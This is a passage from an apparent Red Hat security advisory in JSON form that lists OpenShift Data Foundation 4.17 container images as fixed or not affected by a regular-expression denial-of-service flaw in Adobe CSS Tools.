"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2250364"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
